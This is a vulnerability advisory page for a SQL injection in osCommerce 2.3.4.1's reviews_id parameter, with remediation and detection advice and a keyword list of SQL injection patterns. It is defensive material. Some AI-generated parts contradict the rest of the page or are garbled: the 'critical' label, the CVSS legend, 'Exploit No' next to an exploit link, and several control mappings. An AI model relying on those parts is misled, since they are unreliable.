Vulnerabilities ›

CVE-2019-25495

High

CWE-89 — Weakness Type

                    Published: Feb 27, 2026                      ·  Modified: Feb 28, 2026                      ·  Source: NVD                

CVSS v3

8.2

🔗 NVD Official

📄 Description (English)

osCommerce 2.3.4.1 contains a SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the reviews_id parameter. Attackers can send GET requests to product_reviews_write.php with malicious reviews_id values using boolean-based SQL injection payloads to extract sensitive database information.

🤖 AI Executive Summary

CVE-2019-25495 is a critical SQL injection vulnerability in osCommerce 2.3.4.1 affecting the product_reviews_write.php endpoint. Unauthenticated attackers can exploit boolean-based SQL injection through the reviews_id parameter to extract sensitive database information including customer data, credentials, and business intelligence. With a CVSS score of 8.2 and no authentication required, this vulnerability poses an immediate threat to any organization running vulnerable osCommerce instances.

📄 Description (Arabic)

🤖 AI Intelligence Analysis Analyzed: Apr 25, 2026 08:54

🇸🇦 Saudi Arabia Impact Assessment

Saudi e-commerce businesses, particularly SMEs and retail organizations using osCommerce for online storefronts, face direct exposure. High-risk sectors include: (1) Retail & E-commerce platforms selling through osCommerce; (2) Banking sector if integrated with payment processing systems; (3) Government procurement portals if built on osCommerce; (4) Healthcare e-pharmacies; (5) Telecom providers offering online services. The vulnerability enables complete database compromise, exposing customer PII, payment card data, and business records — triggering SAMA and NCA regulatory violations.

🏢 Affected Saudi Sectors

Retail & E-commerce Banking & Financial Services Government & Public Sector Healthcare & Pharmaceuticals Telecommunications Hospitality & Tourism

🎯 MITRE ATT&CK Techniques

T1190 - Exploit Public-Facing Application T1005 - Data from Local System T1213 - Data from Information Repositories T1040 - Traffic Capture or Replay T1557 - Adversary-in-the-Middle

⚖️ Saudi Risk Score (AI)

8.5

/ 10.0

🔧 Remediation Steps (English)

IMMEDIATE ACTIONS:

1. Identify all osCommerce 2.3.4.1 instances in your environment using network scanning tools

2. Isolate affected systems from production if patch cannot be applied immediately

3. Enable Web Application Firewall (WAF) rules to block SQL injection patterns in reviews_id parameter

4. Review database access logs for suspicious SQL queries (UNION, SELECT, INFORMATION_SCHEMA patterns)



PATCHING:

1. Upgrade osCommerce to version 2.3.4.2 or later immediately

2. If upgrade not feasible, apply input validation: sanitize reviews_id parameter using prepared statements/parameterized queries

3. Implement strict input validation: reviews_id must be numeric only, reject any non-numeric characters



COMPENSATING CONTROLS:

1. Implement database-level access controls: restrict database user privileges to minimum required

2. Enable database query logging and monitoring for anomalous SQL patterns

3. Deploy IDS/IPS signatures detecting SQL injection attempts

4. Implement rate limiting on product_reviews_write.php endpoint

5. Use Web Application Firewall with SQL injection detection rules



DETECTION:

1. Monitor for GET requests to product_reviews_write.php with special characters in reviews_id (quotes, semicolons, SQL keywords)

2. Alert on database queries containing UNION, SELECT, OR 1=1 patterns

3. Track failed database authentication attempts and unusual query execution times

🔧 خطوات المعالجة (العربية)

الإجراءات الفورية:

1. تحديد جميع نسخ osCommerce 2.3.4.1 في بيئتك باستخدام أدوات المسح الشبكي

2. عزل الأنظمة المتأثرة عن الإنتاج إذا لم يكن يمكن تطبيق التصحيح فوراً

3. تفعيل قواعد جدار حماية تطبيقات الويب لحجب أنماط حقن SQL في معامل reviews_id

4. مراجعة سجلات الوصول إلى قاعدة البيانات للاستعلامات المريبة (أنماط UNION و SELECT و INFORMATION_SCHEMA)

التصحيح:

1. ترقية osCommerce إلى الإصدار 2.3.4.2 أو أحدث فوراً

2. إذا لم يكن الترقية ممكنة، طبق التحقق من الإدخال: تطهير معامل reviews_id باستخدام الاستعلامات المحضرة

3. تطبيق التحقق الصارم من الإدخال: يجب أن يكون reviews_id رقمياً فقط، رفض أي أحرف غير رقمية

الضوابط البديلة:

1. تطبيق ضوابط الوصول على مستوى قاعدة البيانات: تقييد امتيازات مستخدم قاعدة البيانات

2. تفعيل تسجيل الاستعلامات وراقبة قاعدة البيانات للأنماط غير الطبيعية

3. نشر توقيعات IDS/IPS للكشف عن محاولات حقن SQL

4. تطبيق تحديد معدل على نقطة نهاية product_reviews_write.php

5. استخدام جدار حماية تطبيقات الويب مع قواعد الكشف عن حقن SQL

الكشف:

1. مراقبة طلبات GET إلى product_reviews_write.php بأحرف خاصة في reviews_id

2. التنبيه على استعلامات قاعدة البيانات التي تحتوي على أنماط UNION و SELECT

3. تتبع محاولات المصادقة الفاشلة والاستعلامات غير العادية

📋 Regulatory Compliance Mapping

🟢 NCA ECC 2024

ECC 2024 A.14.2.1 - Information security requirements for system development and maintenance ECC 2024 A.14.2.5 - Secure development policy ECC 2024 A.12.6.1 - Management of technical vulnerabilities

🔵 SAMA CSF

SAMA CSF ID.BE-1 - Business objectives and strategies SAMA CSF PR.DS-6 - Data is protected from unauthorized access SAMA CSF DE.CM-1 - The network is monitored to detect potential cybersecurity events

🟡 ISO 27001:2022

ISO 27001:2022 A.8.1 - Organizational controls for information security ISO 27001:2022 A.14.2.1 - Secure development policy and procedures ISO 27001:2022 A.12.6.1 - Management of technical vulnerabilities

🟣 PCI DSS v4.0.1

PCI DSS 6.5.1 - Injection flaws prevention PCI DSS 6.2 - Security patches and updates PCI DSS 11.2 - Vulnerability scanning

🔗 References & Sources 3

🔗

https://www.exploit-db.com/exploits/46330

disclosure@vulncheck.com

🔗

https://www.oscommerce.com

disclosure@vulncheck.com

🔗

https://www.vulncheck.com/advisories/oscommerce-sql-injection-via-reviewsid-parameter

disclosure@vulncheck.com

📊 CVSS Score

8.2

/ 10.0 — High

📊 CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Attack VectorN — None / Network

Attack ComplexityL — Low / Local

Privileges RequiredN — None / Network

User InteractionN — None / Network

ScopeU — Unchanged

ConfidentialityH — High

IntegrityL — Low / Local

AvailabilityN — None / Network

📋 Quick Facts

Severity High

CVSS Score8.2

CWECWE-89

EPSS0.07%

Exploit No

Patch ✓ Yes

Published 2026-02-27

Source Feed nvd

🇸🇦 Saudi Risk Score

8.5

/ 10.0 — Saudi Risk

Priority: CRITICAL

🏷️ Tags

CWE-89

⚡ Actions

🔗 NVD Official Page ⚡ Exploit-DB Search 🐙 GitHub PoC Search 🎯 MITRE ATT&CK 📊 CVE Details

💬 Comments

Loading comments

CVE-2019-25495

💬 Comments

Introduce Yourself

Sign In Required